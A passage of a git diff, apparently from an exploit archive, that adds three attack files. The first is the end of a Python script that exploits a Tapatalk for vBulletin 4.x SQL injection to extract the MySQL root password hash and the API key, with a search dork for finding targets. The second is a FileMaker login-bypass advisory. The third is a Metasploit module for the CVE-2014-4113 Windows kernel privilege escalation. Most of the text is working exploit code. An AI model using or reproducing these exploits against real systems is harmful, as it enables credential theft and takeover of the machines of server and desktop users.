tapatalk version + print "[ i] Taptalk detected ... ", + path = "".join(re.findall(r"^\s* + AND subscribethreadid.userid = 0"; + + : 1 UNION ALL OR FALSE + ''' + + query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) + query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" + + if self.debug: + print """ SELECT subscribethreadid + FROM subscribethread AS subscribethread + LEFT JOIN user AS user ON (user.userid=subscribethread.userid) + WHERE subscribethreadid = %s + AND subscribethread.userid = 0"""%query + + return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_" + + def attack_2(self, sqli, sleep=2): + ''' + SELECT subscribeforumid + FROM subscribeforum AS subscribeforum + LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) + WHERE subscribeforumid = + AND subscribeforum.userid = 0"; + + : 1 UNION ALL OR FALSE + ''' + + query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) + query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" + + if self.debug: + print """ SELECT subscribeforumid + FROM subscribeforum AS subscribeforum + LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) + WHERE subscribeforumid = %s + AND subscribeforum.userid = 0"""%query + + return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_" + + def attack_blind(self,sqli,sleep=2): + return self.attack_func(sqli,sleep=sleep) + #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli) + + def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True): + ''' + provide = select -1 from user where user='debian-sys-maint' where + ''' + + + hit = False + # PHASE 1 - guess entry length + print "[ ] trying to guess length ..." + for guess_length in xrange(maxlength+1): + q = query.replace("","length(%s)"%column).replace("","= %s"%guess_length) + + self.stopwatch() + self.attack_blind(q, sleep) + duration = self.stopwatch() + + print ".", + + if duration >= sleep-sleep/8: + # HIT! - got length! => guess_length + hit = True + print "" + break + + if not hit: + print "[ !!] unable to guess password length, check query!" + return None + + + print "[ *] LENGTH = %s"%guess_length + + # PHASE 2 - guess password up to length + print "[ ] trying to guess value ..." + hits = 0 + result = "" + for pos in xrange(guess_length): + # for each char pos in up to guessed length + for attempt in self.bruteforce(charset, 1): + # probe all chars in charset + #attempt = re.escape(attempt) + if attempt == "%%": + attempt= "\%" + #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary + q = query.replace("",column).replace("","LIKE '%s%s%%' "%(result,attempt)) + + self.stopwatch() + self.attack_blind(q, sleep) + duration = self.stopwatch() + + #print result,attempt," ",duration + print ".", + if duration >= sleep-sleep/8: + if case: + # case insensitive hit - recheck case: this is drastically reducing queries needed. + q = query.replace("",column).replace("","LIKE binary '%s%s%%' "%(result,attempt.lower())) + self.stopwatch() + self.attack_blind(q, sleep) + duration = self.stopwatch() + if duration >= sleep-sleep/8: + attempt = attempt.lower() + else: + attempt = attempt.upper() + # case sensitive - end + + + + # HIT! - got length! => guess_length + hits += 1 + print "" + print "[ +] HIT! - %s[%s].."%(result,attempt) + result += attempt + break + + if not hits==guess_length: + print "[ !!] unable to guess password length, check query!" + return None + + print "[ *] SUCCESS!: query: %s"%(query.replace("",column).replace("","='%s'"%result)) + return result + + def bruteforce(self, charset, maxlength): + return (''.join(candidate) + for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i) + for i in range(1, maxlength + 1))) + + def stopwatch(self): + stop = time.time() + diff = stop - self.stopwatch_start + self.stopwatch_start=stop + return diff + +if __name__=="__main__": + #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start + DEBUG = False + TARGET = "http://TARGET/vbb4/forum.php" + x = Exploit(TARGET,debug=DEBUG) + + print "[ ] TAPATALK for vBulletin 4.x - SQLi" + print "[--] Target: %s"%TARGET + if DEBUG: print "[--] DEBUG-Mode!" + + print "[ +] Attack - sqli" + + + query = u"-1 UNION SELECT 1%s"%unichr(0) + if DEBUG: + print u""" SELECT subscribeforumid + FROM subscribeforum AS subscribeforum + LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) + WHERE subscribeforumid = %s + AND subscribeforum.userid = 0"""%query + + + print "[ *] guess mysql user/pass" + print x.attack_blind_guess("select -1 from mysql.user where user='root' and ", + column="password", + charset="*"+string.hexdigits, + maxlength=45) # usually 40 chars + 1 (*) + + print "[ *] guess apikey" + print x.attack_blind_guess("select -1 from setting where varname='apikey' and ", + column='value', + charset=string.ascii_letters+string.digits, + maxlength=14, + ) + + print "-- done --" \ No newline at end of file diff --git a/platforms/windows/local/35077.txt b/platforms/windows/local/35077.txt new file mode 100755 index 000000000..224c1adc5 --- /dev/null +++ b/platforms/windows/local/35077.txt @@ -0,0 +1,64 @@ +Filemaker Login Bypass and Privilege Escalation +======================================================================= + +[ADVISORY INFORMATION] + +Title: Filemaker Login Bypass and Privilege Escalation +Discovery date: 19/10/2014 +Release date: 19/10/2014 +Vendor Homepage: www.filemaker.com +Version: Filemaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4 +Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) + +[VULNERABILITY INFORMATION] + +Class: Authentication Bypass and Privilege Escalation +Category: Desktop Application +Severity: High +CVSS v2 Vector: 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C + +[AFFECTED PRODUCTS] + +This security vulnerability affects: + + * FileMaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4 + +[VULNERABILITY DETAILS] + +There is a obvious vulnerability of FileMaker that allow access to the local FM-based database file: +On DBEngine dll, there is a function called MatchPasswordData: + + ... + ... + ... + 5BB8D53A C68424 74020000 >MOV BYTE PTR SS:[ESP+274],0 + 5BB8D542 FF15 D437D25B CALL DWORD PTR DS:[<&Support.??1PasswordHash@Draco@@QAE@XZ>] <-- Compute the password's hash. + 5BB8D548 8B8C24 6C020000 MOV ECX,DWORD PTR SS:[ESP+26C] + 5BB8D54F 5F POP EDI + 5BB8D550 5E POP ESI + 5BB8D551 8AC3 MOV AL,BL <-- if AL is 0 then you are not authenticated else if AL is 1 you are authenticated, + so simply by changing a single bit you are able to bypass the login, + also if your username is Admin, you can obtain a privilege escalation and full permissions on DB. + 5BB8D553 64:890D 00000000 MOV DWORD PTR FS:[0],ECX + 5BB8D55A 5B POP EBX + 5BB8D55B 8BE5 MOV ESP,EBP + 5BB8D55D 5D POP EBP + 5BB8D55E C2 0400 RETN 4 + ... + ... + ... + + +it doesn't matter if your desktop or mobile application is developed in a "secure manner", your confidential data on the database can be accessed. + +[DISCLOSURE TIME-LINE] + + * 19/10/2014 - Public disclosure and simultaneously initial vendor contact. + +[DISCLAIMER] + +The author is not responsible for the misuse of the information provided in +this security advisory. The advisory is a service to the professional security +community. There are NO WARRANTIES with regard to this information. Any +application or distribution of this information constitutes acceptance AS IS, +at the user's own risk. This information is subject to change without notice. \ No newline at end of file diff --git a/platforms/windows/local/35101.rb b/platforms/windows/local/35101.rb new file mode 100755 index 000000000..6762ba16d --- /dev/null +++ b/platforms/windows/local/35101.rb @@ -0,0 +1,158 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/post/windows/reflective_dll_injection' +require 'rex' + +class Metasploit3 < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::FileInfo + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference', + 'Description' => %q{ + This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability + can be triggered through the use of TrackPopupMenu. Under special conditions, the + NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary + code execution. This module has been tested successfully on Windows XP SP3, Windows + 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows + 2008 R2 SP1 64 bits. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # vulnerability discovery and exploit in the wild + 'juan vazquez', # msf module (x86 target) + 'Spencer McIntyre' # msf module (x64 target) + ], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + # Tested on (32 bits): + # * Windows XP SP3 + # * Windows 2003 SP2 + # * Windows 7 SP1 + # * Windows 2008 + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + # Tested on (64 bits): + # * Windows 7 SP1 + # * Windows 2008 R2 SP1 + [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] + ], + 'Payload' => + { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => + [ + ['CVE', '2014-4113'], + ['OSVDB', '113167'], + ['BID', '70364'], + ['MSB', 'MS14-058'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'] + ], + 'DisclosureDate' => 'Oct 14 2014', + 'DefaultTarget' => 0 + })) + end + + def check + os = sysinfo["OS"] + + if os !~ /windows/i + return Exploit::CheckCode::Unknown + end + + if sysinfo["Architecture"] =~ /(wow|x)64/i + arch = ARCH_X86_64 + elsif sysinfo["Architecture"] =~ /x86/i + arch = ARCH_X86 + end + + file_path = expand_path("%windir%") << "\\system32\\win32k.sys" + major, minor, build, revision, branch = file_version(file_path) + vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") + + # Neither target suports Windows 8 or 8.1 + return Exploit::CheckCode::Safe if build == 9200 + return Exploit::CheckCode::Safe if build == 9600 + + if arch == ARCH_X86 + return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build) + else + return Exploit::CheckCode::Detected if build == 7601 + end + + return Exploit::CheckCode::Unknown + end + + def exploit + if is_system? + fail_with(Exploit::Failure::None, 'Session is already elevated') + end + + if check == Exploit::CheckCode::Safe + fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") + end + + if sysinfo["Architecture"] =~ /wow64/i + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64 + fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + end + + print_status('Launching notepad to host the exploit...') + notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) + begin + process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + rescue Rex::Post::Meterpreter::RequestError + # Reader Sandbox won't allow to create a new process: + # stdapi_sys_process_execute: Operation failed: Access is denied. + print_status('Operation failed. Trying to elevate the current process...') + process = client.sys.process.open + end + + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + if target.arch.first == ARCH_X86 + dll_file_name = 'cve-2014-4113.x86.dll' + else + dll_file_name = 'cve-2014-4113.x64.dll' + end + + library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name) + library_path = ::File.expand_path(library_path) + + print_status("Injecting exploit into #{process.pid}...") + exploit_mem, offset = inject_dll_into_process(process, library_path) + + print_status("Exploit injected. Injecting payload into #{process.pid}...") + payload_mem = inject_into_process(process, payload.encoded) + + # invoke the exploit, passing in the address of the payload that + # we want invoked on successful exploitation. + print_status('Payload injected. Executing exploit...') + process.thread.create(exploit_mem + offset, payload_mem) + + print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') + end + +end \ No newline at end of file